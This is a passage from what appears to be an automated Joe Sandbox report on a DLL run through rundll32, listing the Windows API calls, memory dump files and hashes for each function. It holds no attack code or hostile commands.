                    • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,6C7C80AD,00000065,Function_00005354,0000D7B2,?), ref: 6C7C8046
                    • GetLastError.KERNEL32(?,?,?,?,?,6C7C80AD,00000065,Function_00005354,0000D7B2,?,?,?,6C9DB5A5,00000000), ref: 6C7C804D
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorFileLastWrite
                    • String ID:
                    • API String ID: 442123175-0
                    • Opcode ID: 5fa7df412c210b3e55473807578ee8112e47ddde82911df4043d0e027891e07a
                    • Instruction ID: 46cc22f974c975ede55fa839941734b48bd7a9be5f5c1fe8129ce5b429e6dee1
                    • Opcode Fuzzy Hash: 5fa7df412c210b3e55473807578ee8112e47ddde82911df4043d0e027891e07a
                    • Instruction Fuzzy Hash: 88014C7130420AAFDB40DE69DA88B9AB7E9DF49354F158526F804CBA40EB71DC9487B2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C9DB784 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetSystemDefaultLangID.KERNEL32 ref: 6C9DB79A
                    • VerLanguageNameW.KERNEL32(?,?,000000FA), ref: 6C9DB7B3
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: DefaultLangLanguageNameSystem
                    • String ID:
                    • API String ID: 2685979248-0
                    • Opcode ID: b498eadddab7a71f4294ef9befd8a01c5003286b57a35ea8520a8fff371455d3
                    • Instruction ID: fcbb6567c4b70161923090351aa7b1874031abe71ec8a783e7ce5ce0eb8bd9da
                    • Opcode Fuzzy Hash: b498eadddab7a71f4294ef9befd8a01c5003286b57a35ea8520a8fff371455d3
                    • Instruction Fuzzy Hash: 15F0C271E10149AFCF40DFE9D9889DDB7F8AB09204F6086A5B528E7754EB30AE04CB51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7CEA88 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                    Download Yara Rule
                    APIs
                    • GetModuleFileNameW.KERNEL32(6C7C0000,?,00000105,6C7C0000,6CD4EC54,6C7CEAF4,6C7E1FBC,?,6C7D1805,00010000,00001000,00001000), ref: 6C7CEAA6
                      • Part of subcall function 6C7CFD48: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,6C7CFE04,?,6C7C0000,6CD4EC54,?,6C7CEAB4,6C7C0000,?,00000105,6C7C0000,6CD4EC54,6C7CEAF4), ref: 6C7CFD84
                      • Part of subcall function 6C7CFD48: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,6C7CFE04,?,6C7C0000,6CD4EC54,?,6C7CEAB4,6C7C0000,?,00000105), ref: 6C7CFDD5
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: FileModuleName$LibraryLoad
                    • String ID:
                    • API String ID: 4113206344-0
                    • Opcode ID: 09ddc468e918232d92f24f1bf2a82953b666190d4328936f184ce67041bedd1f
                    • Instruction ID: 5e96dbd8bbb88b6c9316198b4670771f027e654be659180fc2930042bc8344f9
                    • Opcode Fuzzy Hash: 09ddc468e918232d92f24f1bf2a82953b666190d4328936f184ce67041bedd1f
                    • Instruction Fuzzy Hash: 83E0ED71A003159FCB00DE58D9C5E8A77E8BF09758F084AA1AD54CF346D3B1D9548BE2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7E979C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                    Download Yara Rule
                    APIs
                    • CreateDirectoryW.KERNEL32(00000000,00000000,?,6C9DB9D7,6C9DBCE4,?,6C9DBCE4,?,?,00000003,00000000,6C9DBC16), ref: 6C7E97A9
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: CreateDirectory
                    • String ID:
                    • API String ID: 4241100979-0
                    • Opcode ID: 5cd3d4abae112abe19aae35c09ef96789fd4b31aa16552b712e8d17da6aa354e
                    • Instruction ID: aa4ac3b886ae5954b5788b10bf2e9b44863f7441c66d27f2cb178b71c68dadc1
                    • Opcode Fuzzy Hash: 5cd3d4abae112abe19aae35c09ef96789fd4b31aa16552b712e8d17da6aa354e
                    • Instruction Fuzzy Hash: EDB092B2B502401EEA0065B80DDCB6E408CA70460EF100832B951C7681DB66D8080111
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C893B60 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,6C955844,6C955844,6C955844,?,6C92ACEF,6C92D584,6C955844,6C955844,6C955844,042BD080,?,6C9B1D27), ref: 6C893B7E
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: fbc5aca6889f7a66a8bd32f0640c28e9ac7e45ef7dd1efd7cfc32bb571d95ac5
                    • Instruction ID: 1fefe72410493511e106ad50b5d42b15eff2c02540ca3f83645f6147a9c3fa6e
                    • Opcode Fuzzy Hash: fbc5aca6889f7a66a8bd32f0640c28e9ac7e45ef7dd1efd7cfc32bb571d95ac5
                    • Instruction Fuzzy Hash: 48114C74200305AFD720CF19C881B82F7E4EB89350F14893AE9A9CBB44D370E914CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7C58E8 Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,?,6C7C5EFF,?,6C7CF9D1,6C7E1FB8,?,?,6C7CF968,00000000,6C7CF98D), ref: 6C7C58FF
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 5fe93a366dac0596eee60c241d5f610087722d6935bb135298c954b2dda76a09
                    • Instruction ID: 4794626067cc3563887c76531e53d3a075ca025a932c8d9a31275ab1644736e6
                    • Opcode Fuzzy Hash: 5fe93a366dac0596eee60c241d5f610087722d6935bb135298c954b2dda76a09
                    • Instruction Fuzzy Hash: 58F0AFF6B013025FFB548F789A857827BE9A709354F51427EEA09DBBC4E7B088008780
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7D2448 Relevance: 1.3, APIs: 1, Instructions: 4memoryCOMMON
                    Download Yara Rule
                    APIs
                    • LocalAlloc.KERNEL32(00000040,00000000,6C7D2482,?,6C7D2547,00000017,6C7C7225,6C7CA550,6C7F0DD8,?,?,00000007,?,?,?,?), ref: 6C7D244B
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: AllocLocal
                    • String ID:
                    • API String ID: 3494564517-0
                    • Opcode ID: 7f619f6d4c613dcc59be794de313b56d512f77e4c10afe6dde960c1e39bad4f4
                    • Instruction ID: 35448011e02ee0192e127940c723ca6ca00c9caab6f59e91df7f6e36e5f06c92
                    • Opcode Fuzzy Hash: 7f619f6d4c613dcc59be794de313b56d512f77e4c10afe6dde960c1e39bad4f4
                    • Instruction Fuzzy Hash:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 6C7CF414 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 151stringlibraryfileCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNEL32(kernel32.dll,6C7E1FB8,?,?,?,6C7CF75F,00000000,6C7CF818,?,80000001,Software\Embarcadero\Locales,00000000,00020019,?,00000000,6C7CF83C), ref: 6C7CF431
                    • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 6C7CF442
                    • FindFirstFileW.KERNEL32(?,?,kernel32.dll,6C7E1FB8,?,?,?,6C7CF75F,00000000,6C7CF818,?,80000001,Software\Embarcadero\Locales,00000000,00020019,?), ref: 6C7CF550
                    • FindClose.KERNEL32(?,?,?,kernel32.dll,6C7E1FB8,?,?,?,6C7CF75F,00000000,6C7CF818,?,80000001,Software\Embarcadero\Locales,00000000,00020019), ref: 6C7CF562
                    • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,6C7E1FB8,?,?,?,6C7CF75F,00000000,6C7CF818,?,80000001,Software\Embarcadero\Locales,00000000), ref: 6C7CF56E
                    • lstrlenW.KERNEL32(?), ref: 6C7CF5B3
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                    • String ID: GetLongPathNameW$\$kernel32.dll
                    • API String ID: 1930782624-3908791685
                    • Opcode ID: b62988c3b6ac7bb229e74d385e45e0b7e833276b740a8df651c4a6f4e7119164
                    • Instruction ID: 8daeb7a67e0ff8eae295a60c52032214b001bac779d1d02bb226275fd18c8d5d
                    • Opcode Fuzzy Hash: b62988c3b6ac7bb229e74d385e45e0b7e833276b740a8df651c4a6f4e7119164
                    • Instruction Fuzzy Hash: 68518F31B0060A9FCB00DFA8DA88BDEB3B9AF44314F1485A59614D7750EB78EE458B46
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C901C0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 79comCOMMON
                    Download Yara Rule
                    APIs
                    • EnterCriticalSection.KERNEL32(6CD619D8,00000000,6C901D52,?,?), ref: 6C901C50
                    • CoCreateInstance.OLE32(6CD51FD8,00000000,00000005,6C901D7C,00000000,00000000,6C901D03,?,6CD619D8,00000000,6C901D52,?,?), ref: 6C901C86
                    • LeaveCriticalSection.KERNEL32(6CD619D8,6C901D0A,6C901D52,?,?), ref: 6C901CFB
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: CriticalSection$CreateEnterInstanceLeave
                    • String ID: (%X)$CLSID_WICImagingFactory
                    • API String ID: 2599307331-3070663610
                    • Opcode ID: 0031fdc9b02c41891cdcdd9451ff1dbd1ec0954a8920e766657eeebcdfe6d0ac
                    • Instruction ID: 2fc728479142871b5b368a615910d2a6f99c067bb036c2c169d81404caaf036c
                    • Opcode Fuzzy Hash: 0031fdc9b02c41891cdcdd9451ff1dbd1ec0954a8920e766657eeebcdfe6d0ac
                    • Instruction Fuzzy Hash: C7219470B04605AFDB01CBA9C945BEABBF8EB4A31CF414869E910E7F50D735D904CB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C882940 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                    Download Yara Rule
                    APIs
                    • FindResourceW.KERNEL32(00000001,?,?,6C852F04,00000001,6C7C0000,00000000,?,6C88282E,00000000,?,?,00000000,00000000,?,6C902798), ref: 6C882957
                    • LoadResource.KERNEL32(00000001,6C8829DC,00000001,?,?,6C852F04,00000001,6C7C0000,00000000,?,6C88282E,00000000,?,?,00000000,00000000), ref: 6C882971
                    • SizeofResource.KERNEL32(00000001,6C8829DC,00000001,6C8829DC,00000001,?,?,6C852F04,00000001,6C7C0000,00000000,?,6C88282E,00000000,?,?), ref: 6C88298B
                    • LockResource.KERNEL32(6C87FB64,00000000,00000001,6C8829DC,00000001,6C8829DC,00000001,?,?,6C852F04,00000001,6C7C0000,00000000,?,6C88282E,00000000), ref: 6C882995
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: Resource$FindLoadLockSizeof
                    • String ID:
                    • API String ID: 3473537107-0
                    • Opcode ID: 60e6fbf0a250305a67a898fb0c774dc650f9b481f28f0fc701b5980bbba3e178
                    • Instruction ID: 0eb8a8b1d993eac0f96d79af77241e4d51f4c3b7013d280ba9e58325a2a34988
                    • Opcode Fuzzy Hash: 60e6fbf0a250305a67a898fb0c774dc650f9b481f28f0fc701b5980bbba3e178
                    • Instruction Fuzzy Hash: 5EF0AD726052006F4B15DE5CAE88D9B77ECEF882A831005AAFC18C7B09DB34ED044374
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7CEFB0 Relevance: 4.6, APIs: 3, Instructions: 100COMMON
                    Download Yara Rule
                    APIs
                    • IsValidLocale.KERNEL32(?,00000002,00000000,6C7CF117,?,6C7E1FB8,?,00000000), ref: 6C7CF05A
                    • GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,6C7CF117,?,6C7E1FB8,?,00000000), ref: 6C7CF076
